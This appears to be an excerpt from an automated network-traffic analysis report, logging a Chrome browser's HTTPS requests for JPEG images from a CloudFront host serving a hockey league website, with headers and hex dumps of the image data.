                                                                                                                          2025-01-13 21:01:19 UTC8192INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 02 00 26 00 26 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 01 9b 02 da 03 01 22 00 02 11 01 03 11 01 ff c4 00 1d 00 00 02 02 03 01 01 01 00 00 00 00 00 00 00 00 00 01 02 00 03 07 08 09 06 04 05 ff c4 00 68 10 00 01 02 05 02 03 04 05 03 0b 0d 0a 0a 08 07 01 01 02 03 00 04 05 06 11 07 12 08 21 31 13 41 51 61 09 14 22 71 81 15 32 91 23
                                                                                                                          Data Ascii: JFIF&&CC"h!1AQa"q2#
                                                                                                                          2025-01-13 21:01:19 UTC16384INData Raw: fa 4d b2 d2 81 52 d6 14 14 37 a7 24 a4 15 25 25 45 47 72 b6 80 00 11 b1 dc 43 d1 6a b7 0e 86 5f 54 3a 15 3d f9 fa 84 f5 0e 65 89 69 66 10 54 e3 ce 14 f2 4a 52 3a 93 e1 1f 85 a3 3a e6 e6 a8 56 ab 34 79 a5 52 65 d6 fb 1f 2b db de ad 30 1d 5b b4 c5 2d 4d a5 4f a4 28 ed 74 29 29 52 93 cb d9 75 1e 71 4c 96 ba cd c8 cf 59 b2 17 67 c9 f2 73 35 4a c4 e5 ad 5b 96 48 50 5c bd 49 a0 0b 4e a3 27 93 2b f6 7a f7 3e d7 3f 15 31 12 6a 2c c3 49 68 1d 1d ac d1 b0 1f 7b ce da 9e 68 c3 64 26 c3 36 24 e6 dc 9d f9 2f 9b 82 eb 56 e3 b3 38 73 b6 2d db b2 89 39 49 aa 4b 2e 6c bd 29 36 d1 6d d6 f7 4c 38 a4 e5 27 98 c8 20 fc 63 1f 71 2d a7 b7 c5 cb c5 3e 8a dd 36 fd a9 53 a8 52 28 af a1 55 19 d9 79 75 2d 99 51 eb 21 59 71 43 92 79 73 e7 19 b2 43 55 9a 6a d9 bc f5 1e bc a9 79 7b 52
                                                                                                                          Data Ascii: MR7$%%EGrCj_T:=eifTJR::V4yRe+0[-MO(t))RuqLYgs5J[HP\IN'+z>?1j,Ih{hd&6$/V8s-9IK.l)6mL8' cq->6SR(Uyu-Q!YqCysCUjy{R
                                                                                                                          2025-01-13 21:01:20 UTC16384INData Raw: b8 e5 b3 93 72 68 9b d5 a6 9a dd 31 6e 4e b5 3a 92 07 30 da 8f 66 e7 c3 0a 07 ef 63 4b 85 a7 4c 9d 4e 19 be 8e f8 4f 7e de 76 54 d5 b9 7f ac 49 bf 9b 75 1d df 95 d6 28 f4 7b df 45 b9 cb 8f 4e 26 9e f6 5e 42 6a d2 69 27 a2 93 84 3a 07 bc 16 cf c0 c6 e9 2c 47 2d b8 65 bb 4d 9b ae 16 ad 4d 4e ec 62 66 70 48 3f cf 91 6d f1 d9 f3 f7 15 24 fc 23 a9 8b 18 8b 1c 63 28 25 ea 3d 28 d9 e0 1e f1 a1 f4 1e 2b c5 87 e3 f4 b2 99 0e ed 36 ee dd 7c ea 4e 4c 56 47 74 5e a1 91 15 28 46 54 2b a2 17 ce a1 d4 45 6a 1d f1 7a c7 7c 54 44 4a 0a 88 85 4a 84 54 a1 17 a8 45 6a 11 28 51 90 a8 50 85 c0 8b 0f 58 5c 18 90 15 19 0b 22 41 03 be 22 47 7c 30 19 8c aa b7 52 24 10 3c 60 ed e7 08 27 04 36 88 61 13 97 7c 10 3b cc 24 51 e9 12 24 1c 18 57 4e 43 ac 73 3f d2 09 fb e0 57 fc 0b 25 fa
                                                                                                                          Data Ascii: rh1nN:0fcKLNO~vTIu({EN&^Bji':,G-eMMNbfpH?m$#c(%=(+6|NLVGt^(FT+Ejz|TDJJTEj(QPX\"A"G|0R$<`'6a|;$Q$WNCs?W%
                                                                                                                          2025-01-13 21:01:20 UTC12597INData Raw: 1a e7 fb 17 16 97 f9 dd ac 7f 15 b5 fd 78 f6 e1 ea ed 1e 05 1d d4 ea 8b c8 cc 5d 70 03 b6 3d 60 2f 2d 5e 95 51 8b 51 6c e4 9b 47 c2 05 8d c6 e3 a8 af bb f6 50 34 df fc d9 dc 9f f6 86 3f df 1b 61 a7 d7 8c a6 a2 58 f4 3b e6 42 4d e9 49 6a e4 93 73 ad 30 f1 05 6d a5 63 21 2a 23 96 7d d1 a8 3f b1 71 68 ff 00 9d da c7 f1 5b 5f d7 8d bd d3 9b 2d 8d 3a b0 e8 36 2c ac fb 93 ac d0 a4 5a 91 44 c3 88 08 53 a1 03 1b 8a 46 40 26 33 b8 84 61 f1 05 9f 63 93 9e fa df 36 d6 fe 6e b5 6f 48 fb 58 c4 77 da 36 cb 6d 2d 97 7e e5 e8 e0 8e b0 20 8e a2 32 25 68 57 35 7d 26 96 91 a5 ea dd 02 ee 6d ac 35 5d a3 86 56 ac 72 2e cb ac 83 fc 95 a2 3d 5f a2 f6 f0 08 9d bd ac 17 9d fd b5 b9 7a b4 ba 49 ef 49 2d b9 8f 82 9b 8c 9b e9 23 b1 4d c5 a2 92 37 7c bb 25 4f da f5 34 38 b2 07 31 2e
                                                                                                                          Data Ascii: x]p=`/-^QQlGP4?aX;BMIjs0mc!*#}?qh[_-:6,ZDSF@&3ac6noHXw6m-~ 2%hW5}&m5]Vr.=_zII-#M7|%O481.
                                                                                                                          2025-01-13 21:01:20 UTC4688INData Raw: 21 48 3d 07 28 18 82 06 60 1d 53 90 07 9c 34 00 20 c1 d9 2d d4 86 db e3 0b 0f 00 6a 91 d1 40 31 12 24 48 72 21 41 ce 1b 18 88 04 18 69 28 a0 39 c1 80 33 d2 0c 10 92 91 22 44 86 a7 22 04 18 09 83 09 25 20 8f 38 10 40 cc 24 51 c6 44 11 d2 00 83 09 22 80 e4 71 06 24 48 69 09 c1 48 3d d9 10 21 81 80 92 80 e6 21 11 31 06 01 d1 24 01 cc 30 3e 30 87 91 cc 34 22 92 68 52 31 10 1c 43 72 30 d2 2e 92 58 91 22 43 52 4a 44 08 78 04 42 49 2c 48 91 21 24 8e e8 fc db 92 da b7 ef 0a 2c d5 b9 74 52 25 6a 74 c9 e4 16 df 96 99 6c 2d 0b 1e e3 d0 f8 11 cc 77 47 e8 c4 80 d7 39 8e 0e 69 b1 08 90 1c 32 bb 65 cd be 25 78 00 b8 6c a5 4d 5e 3a 34 dc c5 72 84 37 3a f5 24 fb 73 92 69 ea 7b 3f f1 c8 1f 84 3c 0f 58 d5 5b 42 f4 bc b4 d6 e2 6a e0 b4 6b 73 d4 5a b4 9a f1 da 32 a2 85 72 3c
                                                                                                                          Data Ascii: !H=(`S4 -j@1$Hr!Ai(93"D"% 8@$QD"q$HiH=!!1$0>04"hR1Cr0.X"CRJDxBI,H!$,tR%jtl-wG9i2e%xlM^:4r7:$si{?<X[BjksZ2r<


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          103192.168.11.204992554.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:19 UTC452OUTGET /app/uploads/gthl/2024/10/10101535/2024-World-Mental-Health-Day-Challenge-1600x900-730x411.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:19 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 24312
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:20 GMT
                                                                                                                          Last-Modified: Thu, 10 Oct 2024 14:15:37 GMT
                                                                                                                          ETag: "f69cc52cd81a54b5012b2ada2461726b"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 07b0e28d0c589c8a26610bbc5dcd660a.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: TAey4BzXOxYvdJgtETIIpEWOhrXzZb7ytcKrbHZbRBZDgYq_l4qlYw==
                                                                                                                          2025-01-13 21:01:19 UTC8557INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 02 00 26 00 26 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 01 9b 02 da 03 01 22 00 02 11 01 03 11 01 ff c4 00 1d 00 01 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 04 05 03 08 01 02 06 07 09 ff c4 00 5b 10 00 01 03 03 01 04 06 06 06 04 09 06 0a 0a 03 00 01 00 02 03 04 05 11 06 07 12 21 31 08 13 22 41 51 61 14 15 32 71 81 91 23 52
                                                                                                                          Data Ascii: JFIF&&CC"[!1"AQa2q#R
                                                                                                                          2025-01-13 21:01:19 UTC15755INData Raw: 11 dc a7 ea fc 0f f8 65 ac 6f 26 a1 52 9c 9e 73 1d fe 25 d7 74 ba f8 9f 34 af b4 ad 5a e2 e1 db 51 ba ab 4e 71 8a 8e 1c b1 ee c1 b6 a3 b3 fc ad bc 2f 37 d8 f7 8e d9 9e 92 66 a5 b4 6a c7 0a b3 5f 64 a5 8e 92 94 99 fb 1d 5b 1a 5a 37 86 38 9c 38 f1 56 da a6 c5 67 d6 96 2a 9d 37 79 eb 0d 1d 5e e8 90 44 fd c7 76 5c 1c 30 7b b8 80 b5 a7 a5 7f 48 cb 96 89 a7 a6 d1 da 22 e8 69 af 95 5b b3 d4 d4 c7 87 3a 96 1e e0 33 91 bc e3 f9 0f 30 be 73 d1 d3 5e 6d e3 6a 9a e6 18 2b f6 85 75 16 2b 6b 9b 3d c5 e1 b1 8d f1 9e cc 40 ee f3 71 1f 01 95 de db 83 aa d4 d3 27 a8 cd c6 14 9e 5b 4f 39 6b a6 70 97 7e 8b c4 ad b9 e3 4a ff 00 89 52 a1 cf 39 d5 a7 85 16 9f c1 87 cc 92 79 db 0d e7 c8 db db 9e c6 74 4d eb 4c da 34 9d 64 75 c6 82 c8 e7 3a 90 32 a3 0f 04 f3 de 76 38 f3 59 f5 de
                                                                                                                          Data Ascii: eo&Rs%t4ZQNq/7fj_d[Z788Vg*7y^Dv\0{H"i[:30s^mj+u+k=@q'[O9kp~JR9ytML4du:2v8Y


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          104192.168.11.204992854.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:19 UTC666OUTGET /app/uploads/gthl/2023/07/13145939/5HealthySnacks-1024x512jpg-730x365.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:20 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 98422
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:21 GMT
                                                                                                                          Last-Modified: Thu, 13 Jul 2023 18:59:40 GMT
                                                                                                                          ETag: "3505b35843be9fbc0dfa7af75c0ae9bb"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 d439433d975e4e608c1677c8e16e7fe2.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: 7j7Qq7MX4Czc6CkPkDfJt9THw0BYIm9nGZ1Msqosp8vPu-gEL0fmOg==
                                                                                                                          2025-01-13 21:01:20 UTC14588INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 01 2c 01 2c 00 00 ff e1 18 e2 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 21 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 93 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 00 01 2c 00 00 00 01 00 00 01 2c 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 30 20 28 4d 61 63 69 6e 74 6f 73 68 29 00 32 30 32 33 3a 30 37 3a 31 33 20 31 34 3a 35 39 3a 32 32 00 00 00 03 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00 04 00 00 00 01 00 00 04 00 a0 03 00 04 00 00 00 01 00 00 02 00 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00
                                                                                                                          Data Ascii: JFIF,,ExifMM*bj(1!r2i,,Adobe Photoshop 24.0 (Macintosh)2023:07:13 14:59:22
                                                                                                                          2025-01-13 21:01:20 UTC2411INData Raw: 3d 7f 2c d3 0a 72 a9 9e 88 48 b9 e7 26 4f 16 14 ea c1 d4 dc ba 2c 3c 7b 63 2d 5a b5 aa 3d 87 92 e0 91 a6 34 a3 05 77 6e b6 64 49 be 9e 59 95 97 60 7c 27 d7 72 22 fa 7f 4b a8 f3 94 7f f2 76 20 eb c1 e4 a4 df 52 0f 42 a7 c8 cd 66 63 46 f6 9a 08 4f 8c e9 8d 89 ce 9f 36 94 d5 ff 00 d3 1b f8 ea 42 d4 f5 94 7b dd fc 16 42 29 aa 84 8c 99 3e ea 57 91 9d fd d0 7c 95 74 58 12 7c 90 e5 47 15 53 3a 93 76 e9 69 7b f9 1a 69 50 ab 53 fa 14 7b 6d eb f9 1a 66 6b b2 5a 55 4f a0 55 27 ff 00 e2 b8 8e 25 bf d2 5d bc d1 9d fd 3e 8b 77 94 ef d5 76 6f a7 83 a9 a5 6a b1 8f 42 cd f7 2f 71 8a 6b 15 d5 b3 b3 1a 6e 87 4f 07 bd e3 f8 f7 07 52 3d 91 25 f4 cc 3f f6 49 f8 7b 1d 2a 7f 4d a1 6b b7 39 76 6c af 10 a4 4c 56 27 8d 94 e5 56 63 c1 25 4b 69 3d 04 a0 79 e2 f8 7d 3e 84 34 a3 df 2f
                                                                                                                          Data Ascii: =,rH&O,<{c-Z=4wndIY`|'r"Kv RBfcFO6B{B)>W|tX|GS:vi{iPS{mfkZUOU'%]>wvojB/qknOR=%?I{*Mk9vlLV'Vc%Ki=y}>4/
                                                                                                                          2025-01-13 21:01:20 UTC16384INData Raw: 5e a7 42 97 d6 2d cd c4 53 4f ab d9 dd 0d 33 b4 6a b8 b7 ba 4d 35 3a 11 a9 d7 db 0f a7 a9 c4 e6 b8 9e bb c1 fa 9a eb 74 6a 47 a3 27 da 8d d4 b1 58 7f fa 2d c6 fb 93 d9 f0 77 8b ec 30 2a 13 0c 35 63 c7 a1 b4 77 ea fe b6 c0 e9 22 ce 23 ac 18 a1 c7 0d 55 ed 47 98 fa 72 ee 62 78 78 49 ee 6d ff 00 da ff 00 fc 5f 78 a2 47 18 b6 da ad 33 ef 08 d4 1f 4a b8 f9 65 7e 70 d2 9e bb 44 b6 6a c1 f3 96 d7 9f e7 ad 33 3d 7f a3 b9 2f db cd f0 fb 65 dd a3 ec 3a 06 dc 95 99 cd 99 69 de c5 71 43 92 fb 6a ce 42 ff 00 38 6b 1d 31 a2 87 25 29 6d e1 6a f2 73 e0 f4 7d 17 f7 4c e2 d4 8d 5a 69 d3 a9 1d b8 f0 de bb 3d 85 06 65 6c 90 27 9b cd dd 32 c8 e4 f4 91 b3 a6 2d aa e8 d4 9e c6 36 1c 95 4d d3 5a 3e 9c 8a 23 0b ab e1 de d2 fe d7 af 60 a5 2e 14 66 af 38 10 ae d5 d6 f4 85 74 c2 9c
                                                                                                                          Data Ascii: ^B-SO3jM5:tjG'X-w0*5cw"#UGrbxxIm_xG3Je~pDj3=/e:iqCjB8k1%)mjs}LZi=el'2-6MZ>#`.f8t
                                                                                                                          2025-01-13 21:01:20 UTC1024INData Raw: f0 3a f3 bc 91 e2 ff 00 e2 2a b2 a7 56 dc 52 b7 ce bf 23 b1 f4 f8 a5 07 50 86 78 52 d6 bd d3 ca 32 64 d2 ab a6 42 51 0d db 71 55 d4 7c e2 3a 5f f0 d5 2d 9c 2b a8 ff 00 93 b9 8f 1b 2f dc d9 e0 43 91 e8 8c 65 c0 e0 b5 86 e4 f0 be 4d e6 b1 84 fa 02 5c 9c 71 c5 a5 6a 1a 43 48 d0 2d d2 41 8f 27 f5 7b bc 47 2b 2c d4 32 8a e3 27 bf e7 49 d4 c1 aa 95 63 1c 2d 3f e4 c9 2b 0d 29 e9 a4 3f 88 6a 20 a1 e9 d1 74 21 5f 89 64 6a 1d 27 db 1e 62 b4 b9 35 b1 7b ca 5a be 3c 7b f4 5d 07 6f 1e a3 07 1c 25 1d 23 e3 21 be ad 55 5b 8f 09 ec c0 e3 ca 51 66 45 83 a8 aa da 56 77 00 3c 97 df 16 d0 8a b3 a9 3f 8b e6 9d 86 cc 36 19 28 f2 57 b2 d6 4f a3 87 68 13 ff 00 d3 f4 d1 6c e9 99 f9 a5 fe 73 ce 2b 6f 30 f3 01 cd 18 1d 47 5a 6e a3 c9 79 2f 9a 71 62 6f f5 55 78 42 3e 09 7c ed 60 69
                                                                                                                          Data Ascii: :*VR#PxR2dBQqU|:_-+/CeM\qjCH-A'{G+,2'Ic-?+)?j t!_dj'b5{Z<{]o%#!U[QfEVw<?6(WOhls+o0GZny/qboUxB>|`i
                                                                                                                          2025-01-13 21:01:20 UTC16384INData Raw: 06 9e d2 c9 ad 51 a6 1c 79 34 49 c7 a8 ce 1c d6 c9 2b 65 b3 a8 6f 09 e6 db 6d 91 a3 17 4f 94 8c 71 54 de bb fd fc 89 63 a2 f1 10 58 95 ae f7 ee 39 f6 2b 2d 29 da 73 c9 0e 49 cc 24 94 03 a8 0d a9 ea d6 23 23 6d b5 38 e5 24 64 e5 24 ed 5a 39 49 7c ff 00 26 69 53 0e b0 f2 a9 73 6b 2b 7d 91 9c cb a7 f1 cd 6c 3d 23 51 f1 ed 8d b1 d9 af 0d a8 fc e8 ea f9 b8 31 10 8c a2 ab d3 56 4f 55 c1 fb 3d c3 8f 65 34 34 15 90 77 6e 8e 53 c2 3b e4 da 32 72 6f 81 20 c7 da cf 28 26 9f ed 11 d3 16 d2 d4 a6 b6 88 85 b8 53 f7 1e 9f f0 96 3d 28 95 4d 0a e9 7d c5 1d 8a 0d 43 f6 04 a0 cb e2 8c 65 46 a2 4d b8 e3 6c 4f cd b6 c3 8b 6e d9 c9 0a 36 24 5f 6c 02 6e c5 a8 fb 0d 70 57 f8 cd 77 f4 db fd c8 b7 93 2a e5 59 d8 e4 c7 20 58 7b 25 95 b7 ea f4 9a 85 4a 65 e7 d8 32 ea 4c ca 90 52 12
                                                                                                                          Data Ascii: Qy4I+eomOqTcX9+-)sI$##m8$d$Z9I|&iSsk+}l=#Q1VOU=e44wnS;2ro (&S=(M}CeFMlOn6$_lnpWw*Y X{%Je2LR
                                                                                                                          2025-01-13 21:01:20 UTC11754INData Raw: 59 c0 eb 2e a5 4e 5d 0a 1a 88 ba a0 d9 41 b4 ce e6 18 8c c2 03 8a ac e4 57 27 b8 86 a9 31 55 aa e1 69 39 b9 e9 95 67 bc f2 d4 b0 56 ad 57 36 55 a1 59 13 52 62 3f b1 f3 25 bf 91 b2 1f a6 e7 ef 42 d9 0d a6 75 b8 63 09 d0 f0 65 34 d3 30 fd 39 aa 7c 91 70 bb c4 b4 49 19 e6 d7 3a 49 3b 04 34 ac 26 ee 3b 43 03 8d ae e4 67 00 62 7a ab f5 6a c6 18 93 9c 9e 98 20 ba fa d4 b0 56 40 00 5e ca 03 50 11 1b 12 da 62 0f b1 ef 25 bf 91 b2 1f a6 e7 ef 41 64 1b 4c 1f 63 de 4b 3f 23 64 3f 4d cf de 82 c8 77 67 7b 23 23 2d 4d 93 62 4a 4d 94 b3 2d 2e da 5a 69 b4 ea 42 40 b0 03 aa 18 83 96 84 ba 85 36 b1 74 a8 14 91 bc 18 40 47 6b e0 ef 92 d7 16 a5 ab 08 4a 15 28 dc 9e 35 dd 27 f4 a1 58 77 66 3e c7 4c 95 fe 47 c9 ff 00 9a ef ef 41 61 dc 1f 63 a6 4a ff 00 23 e4 ff 00 cd 77 f7 a0
                                                                                                                          Data Ascii: Y.N]AW'1Ui9gVW6UYRb?%Buce409|pI:I;4&;Cgbzj V@^Pb%AdLcK?#d?Mwg{##-MbJM-.ZiB@6t@GkJ(5'Xwf>LGAacJ#w
                                                                                                                          2025-01-13 21:01:20 UTC8408INData Raw: 1d 4a 5b 20 a5 76 1b b3 c1 f2 88 8c 5d f2 b1 18 b6 f5 46 cc 4b b9 34 b2 db 08 2e 10 2e 57 a9 29 e9 bf 9e 25 18 36 46 73 50 57 93 b0 ac 3c c5 3c 7b ca 5b 98 99 02 dc 66 6f 25 07 9a fd b1 e7 d5 12 b2 5b ee 53 b1 3a bf 76 51 e1 bf f0 35 cc 97 e7 16 54 b7 1d b5 f9 6b 3b 4f 4c 5b 06 a1 ce 6a ec d9 4f 62 9a b2 48 30 25 2d 21 36 58 d5 73 cd 14 ca ed 91 bb 6f 34 26 54 e2 08 49 6e eb 53 86 c8 4f c2 e7 e8 e7 8b 5d 09 45 b5 2d da f4 7e 4b 55 27 9d f7 0a 90 ac c6 8b 60 de e6 eb 59 d1 9c 7d 40 6c 11 4c 95 dd fe 7f 92 96 ae ee fe 7e 46 f5 4e 07 49 7e c4 cb b6 6c d8 1a dd 5e a1 6f 54 6a 8d 06 ad 05 f7 3f 04 6a 54 ad cd de f5 e8 43 94 a3 0e 53 d6 ae 30 8e c9 71 3e fa 47 78 48 d4 3a 06 88 a3 11 28 ce d1 86 8b c7 a4 c9 52 6a aa cb ed 5a 7c e9 1b 56 a1 3b 88 12 94 d8 37 26
                                                                                                                          Data Ascii: J[ v]FK4..W)%6FsPW<<{[fo%[S:vQ5Tk;OL[jObH0%-!6Xso4&TInSO]E-~KU'`Y}@lL~FNI~l^oTj?jTCS0q>GxH:(RjZ|V;7&
                                                                                                                          2025-01-13 21:01:20 UTC16384INData Raw: 61 d4 a5 00 05 a8 0b 02 93 b0 43 15 c6 2e 10 3c 1e 70 d6 4c 30 5b 15 da 14 c5 49 d7 4c e2 18 70 4c b8 95 24 25 49 51 d1 64 8d 37 02 10 5c ae b0 0c 97 78 2b d4 fd ce cb 2d 29 17 b0 9a 69 e9 73 a7 7a 09 f5 40 03 c7 0c 4a 4b b2 39 53 6e 75 49 3c 54 ec 8b 4b 42 b6 12 92 52 7c d0 02 20 a8 00 7a c3 58 cf 11 60 e7 dd 7f 0f d6 27 29 ae 3a 33 5c 32 eb cd cf 1c e3 51 80 0d 31 26 2d af 62 f9 b4 4e 57 ea b3 75 27 d0 9c c4 2e 61 79 d9 a9 dc 37 40 03 44 00 58 ee 05 34 97 9f c6 55 ba a0 49 e2 65 a4 83 45 5b 33 96 b0 40 f1 24 c0 03 3f 0c 8e ea ec fd 1a cf a4 b8 00 82 60 02 d4 f0 1d ed b1 6f ff 00 e5 ff 00 b9 00 11 8f 0a 4c 3f ee 1e 58 aa ae a5 39 ad d4 10 dc e2 7a 54 90 15 e5 49 f1 c0 04 49 00 16 9b 81 26 24 b3 d8 87 0d b8 be d9 2d ce b4 9b ee e4 ab ce 98 00 81 f2 b9 49
                                                                                                                          Data Ascii: aC.<pL0[ILpL$%IQd7\x+-)isz@JK9SnuI<TKBR| zX`'):3\2Q1&-bNWu'.ay7@DX4UIeE[3@$?`oL?X9zTII&$-I
                                                                                                                          2025-01-13 21:01:20 UTC8604INData Raw: 1f 08 6f d2 10 01 7b 32 fb 2e 65 b2 43 88 79 39 cc ae 4c 14 9f 80 ab a6 3c ef e9 5e 1b 1b 1c af 09 3c bf d2 fe 7c c8 d9 ca 6d d3 7c 57 89 41 a3 d1 18 c1 00 19 80 0c 40 05 9a e0 99 84 b0 44 cd 4c 56 95 5a 6a 77 14 b0 92 a6 69 af 37 98 18 1a 8a 93 7e dc db 68 d5 14 d6 55 2d 7a 7a af 12 51 b7 f2 2d 34 c4 9b 73 25 4b 64 71 6f 0e d9 b3 b7 f9 df 1c 1c 4e 02 9e 26 f3 a2 b6 66 b5 8f 1f 9c 4d 50 aa e1 65 2c d7 11 9d d0 a4 bb a4 94 a8 1d 37 d6 0c 79 1a ca 51 a9 9b b3 f1 4c e8 46 cd 0b 53 3c e2 73 43 fa 1c b7 25 dd 61 63 71 de 23 b3 1f a8 d4 8d 96 23 29 5b 29 6e 6b 83 e2 ba 77 19 9d 14 fe cd 38 09 27 69 ed ce 1e c9 96 25 b7 d3 ac 27 49 1e d1 18 f1 38 48 56 bd 6c 3e bb e3 ea b8 ae 9e f3 45 2a d2 87 32 79 af 9d cc d2 5a 7d 6c 80 c4 d0 4a 42 8d 81 3a 5b 5f b0 c4 68 62
                                                                                                                          Data Ascii: o{2.eCy9L<^<|m|WA@DLVZjwi7~hU-zzQ-4s%KdqoN&fMPe,7yQLFS<sC%acq##)[)nkw8'i%'I8HVl>E*2yZ}lJB:[_hb
                                                                                                                          2025-01-13 21:01:20 UTC2481INData Raw: 37 25 ce 49 f1 c4 55 0a 15 57 ec d4 52 e8 96 4f bc 7b 52 8f dc ac 6a b6 78 ae dd 2b 47 ca 17 1e 31 15 ce 82 a5 f7 a6 ba f3 5d e8 6a 7b 5a 1a a5 45 26 e8 07 a8 df f8 c5 71 7b 2e f0 5d cf fc 31 b5 7d 43 84 fb 88 d0 ae 30 75 fb 63 54 7e a3 56 1a b9 2f 9d 29 95 f2 31 7a 1b 8a 92 b6 ba be b4 88 b6 3f 57 9f f7 be d4 84 f0 eb 81 b8 a9 5f f1 b7 ea fe 11 7c 7e b0 df f2 f0 fc 32 0f 0f d0 67 dd 11 b5 c3 fc f5 43 ff 00 9b f1 97 cf fc 43 f4 ef 87 ce f3 53 52 47 c7 57 e7 7f 08 8b fa bc 7a 5f 6f e0 3f 4e cd 7d d1 49 d4 ca 7f 39 44 c5 7f f3 64 f4 82 ed 6d 92 fd 3b e2 6e 99 e2 46 85 b4 8e 81 17 c7 ea 53 7f ca 31 ea 5f 3c 88 ba 0b 83 66 7b 25 b5 76 f3 43 aa fe a8 97 ea a9 cb fa 95 bc fd 2c 2e 4d ad 22 65 33 12 49 fc 61 51 e6 11 28 62 70 10 77 da bf 67 c6 27 4e ab dc 1a 99
                                                                                                                          Data Ascii: 7%IUWRO{Rjx+G1]j{ZE&q{.]1}C0ucT~V/)1z?W_|~2gCCSRGWz_o?N}I9Ddm;nFS1_<f{%vC,.M"e3IaQ(bpwg'N


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          105192.168.11.204992954.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:19 UTC428OUTGET /app/uploads/gthl/2022/11/17161524/IMG_9525-e1734465590754-730x437.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
